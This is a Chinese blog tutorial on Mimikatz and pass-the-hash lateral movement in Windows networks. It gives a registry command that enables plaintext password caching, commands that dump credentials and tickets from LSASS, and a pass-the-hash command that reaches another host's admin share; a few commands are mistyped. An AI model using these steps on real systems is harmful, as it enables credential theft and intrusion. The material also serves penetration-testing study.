内网横向移动|哈希传递PTH|mimikatz使用

已于 2022-05-07 10:38:30 修改
阅读量4.8k 收藏 7
点赞数 1
分类专栏: 内网渗透 文章标签: 网络安全
于 2022-04-25 12:15:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60115503/article/details/124398158
版权

Mimikatz下载地址:链接:https://pan.baidu.com/s/1k7i_Z_iGNbTgVeQiBKWszA   提取码:lyq1 
 

工具简介:

Mimikatz是法国人benjamin开发的一款强大的轻量级调式工具,本意是用来个人测试,但由于其功能强大,能够直接读取Windows-XP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具

注意:

当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文

reg add HKLM/SYSTEM/CurrentControlSet/Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Mimikatz命令

cls:清屏
standard:标准模块
crypto:加密相关模块
sekurlsa:与证书相关的模块
kerberos:kerberos模块
privilege:提权相关模块
process:进程相关模块
serivce:服务相关模块
lsadump:LsaDump模块
ts:终端服务器模块
event:事件模块
misc:杂项模块
token:令牌操作模块
vault:windows证书模块
minesweeper:Mine Sweeper模块
dpapi:DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
busylight:BusyLight Module
sysenv:系统环境值模块
sid:安全标识符模块
iis:IIS XML配置模块
rpc:mimikatz的RPC控制
sr98:用于SR98设备和T5577目标的RF模块
rdm:RDM(830AL)器件的射频模块
acr:ACR模块
version:查看版本
exit:退出

**提升权限 命令: privilegs::debug ** (**可以更改为任意用户)

mimikatz有许多功能都需要管理员权限,如果不是管理员权限不能debug

 抓取明文密码

        在windows2012以上的系统不能直接获取明文密码了,但是可以搭配procdump+mimikatz获取密码

# log
# privilege::debug
# sekurlsa::logonpasswords

 已经爆出来了密码同时NTLM和LM值我们都可以查看

sekurlsa::logonpasswords解析

 msv:这项是账户对于的密码的各种加密协议的密文,可以看到有LM,NTLM和SHA1加密的密文

tspkg,wdigest,kerberos:这个就是账户对于明文密码了,有的时候这三个对于的也不是全部都一样,需要看服务器是什么角色

SSP:是最新登录到其他RDP终端的账户和密码(RDP是3389远程连接)

Sekurlsa模块

sekurlsa::logonpasswords//显示登录的密码
    
sekurlsa::msv//抓取用户NTLM哈希
    
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full//加载dmp文件,并导出其中的明文密码
    
sekurlsa::tickets /export //导出lsass.exe进程中的所有的票据

PTH哈希传递

        pass-the-hash在内网渗透是一种很经典的攻击方法,原理就是攻击者可以通过LM hash和NTLM Hash访问远程主机或者服务,而不用提供明文密码

        pass the hash原理:

                在windows系统中,通常会使用NTLM身份认证

                NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogomUser)

                hash分为LM hash和NT hash,如果密码长度大于15,那么无法生成LM hash,从windows Vista和Windows Server 2008 开始,微软默认禁用LM hash

                如果攻击者获取了hash,就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程)

        这类攻击适用于

                域/工作组环境

                可以获得hash,但是条件不允许对hash爆破

                内网中存在和当前机器相同密码

        微软也对pth打过补丁,然而在测试中发现,打了补丁后,常规的PTH已经无法成功,但是默认的Administrator账号例外,利用这个账号依然可以进行PTH远程ipc连接

        如果禁用了NTLM认证,PsExec无法利用获得的NTLM hash进行远程连接,但是使用mimikatz还是可以成功攻击,从windows到windows横向pth这一类攻击方法比较广泛               

测试

        mimikatz的pth功能需要本地管理员权限,这是由他的实现机制决定的,需要先获得最高权限几次呢lsass.exe信息

lsass.exe

        lsass.exe是一个系统进程,由于微软windows系统的安全机制,它用于本地安全和登录策略,注意:lsass.exe也有可能是Windang.worm,irc.ratsou.b、Webus.B、MyDoom.L、Randex.AR、Nimos.worm创建的,病毒通过软盘、群发邮件和P2P文件共享进行传播

        使用mimikatz获取hash

privilege::debug
sekurlsa::logonpasswords

 得到hash后 使用mimikatz输入

sekurlsa::pth /user:administrator /d
omain:IP地址 /ntlm:2cefb09dda6d6f9becfa3c0f56c3dad7

弹出一个cmd窗口 

执行 dir \\192.168.52.141\c$ 执行成功

总结

        以上就是pth简单利用的哈希传递

QiaN_djx
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常用mimikatz命令合集
03-08
这是我平时使用时觉得最常用的一些命令合集,希望可以帮到大家.
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递
weixin_43263566的博客
04-25 1046
p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递
域渗透之哈希传递攻击及其原理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-09 1820
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议和原理。
哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
02-06
哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
红队技巧-域渗透的协议利用
qq_50854662的博客
03-27 1598
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击,攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了ua...
内网渗透—哈希传递攻击PTH的几种方式
oiadkt的博客
03-11 655
内网渗透—哈希传递攻击PTH的几种方式
PTH攻击总结
systemino的博客
05-26 2534
搞过内网渗透的,你肯定听过pth攻击。这种攻击效果非常显著,微软也是因此在存储凭证方面做了很大的改变。但即使是不断的更新,发布补丁,pth攻击还是存在。今天我们就来一探究竟。 目录 ·pth攻击回顾 ·微软更新 ·hash和NTLM介绍 ·Pth攻击原理 ·Zeros取代LM hash ·实际中的配置 ·pth攻击 ·Mimikatz ·SMB pth攻击 · msf scanner/smb/smb_login · Empire lateral_moveme...
内网渗透 - 哈希传递攻击
LuckySec
06-06 2260
内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码
内网渗透测试小Demo-哈希传递攻击
Love&Share
11-26 2308
文章目录环境搭建Win Server2003Win Server2008拿shell收集信息哈希传递攻击mimikatz推荐阅读 环境搭建 Win Server2003 设置账户密码 右击我的电脑,选择管理,添加本地用户和组,重置admin的密码为123456,方便之后的操作 在vmware中为虚拟机添加一个网卡,网络连接选择LAN区段 开机后手动设置IP地址为 10.0.0.2/24 ipconfig Win Server2008 虚拟机网络连接选择LAN区段,开机后手动设置IP地址为 10.0.
跨链技术方案之哈希锁定|白话区块链入门202
01-07
友情提示:入门连载已经超出200期了,因此科普也有些小难度了,大白建议新入门的小伙伴们,可以去文末扫描二维码,进入科普目录进行系统学习噢。 作者 | 宇星 在白话之前的推文《肖风博士赞不绝口的Cosmos和波卡两大跨链技术项目》中提到了跨链技术,其中跨链技术的实现模式之一就是哈希锁定,今天大白就给大家详细讲解一下什么是哈希锁定。 01 哈希锁定和闪电网络哈希锁定,全称哈希时间锁定合约(Hash TimeLock Contract),是闪电网络中提出的一种新的技术实现形式。哈希锁定模式是指用户在规定的时间段对于哈希值的原值进行猜测来支付的一种机制。简单讲,就是在智能合约的基础上,双方先锁定资产,
pth-toolkit:传递哈希工具集合的修改版本可以直接开箱即用
06-26
pth-工具包 传递哈希工具集合的修改版本设计为便携,即使在最“裸露的骨骼”系统上也可以直接开箱即用 master 分支是为 amd64 编译的,最终目标是将这些工具交叉编译到所有可能的架构 目前,此 repo 提供以下修补工具/实用程序: winexe 微信 管理系统 客户端 客户端 获取 网 要求 sh 所有工具都在只有base包的裸机 Arch linux 安装上进行了测试。 这什么时候有用? 当您使用自定义渗透测试操作系统并且您不想自己经历编译和修补这些工具的痛苦时 用于从受感染的 *nix 主机转向 Windows 框/域的后利用! 只需克隆这个 repo 或下载 tarball 就可以传递所有的哈希值了!
Go语言常见哈希函数的使用
01-20
myhash.go /** * Created with IntelliJ IDEA. * User: liaojie * Date: 12-9-8 * Time: 下午3:53 * To change this template use File | Settings | File Templates. */ package main import ( crypto/md5 crypto/sha1 crypto/sha256 crypto/sha512 flag //命令行选项解析器 fmt hash io
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
内网渗透-哈希传递
最新发布
qq_45953122的博客
10-18 270
哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、LM Hash都不需要明文密码,因此都可以被称为Hash传递攻击。
内网渗透-域横向smb&wmin明文hash传递
weixin_60329395的博客
08-09 1663
该工具可配合minikatz进行明文获取,minikatz被查杀的情况下可使用tips:该工具为微软官方工具,不会被查杀Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载成功后 导入到目标主机 使用CMD命令进行以下命令进行执行即使用该工具生成一个该主机的密码文件 执行成功,自动生成了一个lsass.dmp的文件 将该dmp文件放到自己本机上使用minikatz进行执行tips:将dmp文件放进min
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1277
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
【渗透测试笔记】之【内网渗透——横向移动使用mimikatz和CS进行哈希传递攻击】
AA8j的博客
11-15 3253
文章目录1. mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz 1.1 NTLM Hash传递攻击 首先获得域管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段
Mimikatz源码免杀
LainWith的博客
01-04 4792
目录介绍环境准备处理报错生成32位生成64位下载360、360杀毒直接查杀关键字替换-失败去除注释,修改版本信息删除注释信息替换图标修改版本信息重新编译文件过杀软360家族腾讯电脑管家火绒在线查杀参考 学习一下月师傅的文章 介绍 Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的工具,攻击者可以借此漫游内网。也可以通过明文密码或者传递hash值来提权。因为这款工具特别出名所以被查杀的机率很大,我们可以通过github上的开源代码对其进行源码免
多语言usdt哈希值竞猜系统源码|u哈希源码下载
07-26
多语言USDT哈希值竞猜系统源码是一种用于竞猜USDT的哈希值的系统,它可以用来进行有趣的竞猜活动。该系统的源码可以通过点击下载按钮进行下载。 源码包含多个编程语言的实现,用户可以根据自己的需求选择适合自己的语言来进行开发和使用。这样可以方便不同开发者使用自己熟悉的编程语言进行二次开发。 USDT是一种基于区块链技术的稳定币,哈希值是指通过哈希函数将任意长度的输入转化为固定长度的输出。在该竞猜系统中,用户可以猜测未来某一特定时间的USDT的哈希值,以获得奖励。 该系统的基本原理是通过区块链技术获取指定时间的USDT交易信息,并计算出对应的哈希值。用户可以通过系统提供的界面,输入自己的猜测,并支付一定的USDT作为参与费用。 一旦指定时间到达,系统会自动计算出实际的哈希值,并根据与用户猜测的差距确定获奖规则。根据规则,系统会自动将奖励分发给猜测正确的用户。 该竞猜系统的源码下载后,可以根据需要进行修改和定制。例如可以修改奖励规则和猜测时间等细节,也可以增加其他功能来满足特定需求。 希望以上回答对您有所帮助,如有任何疑问,请随时告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值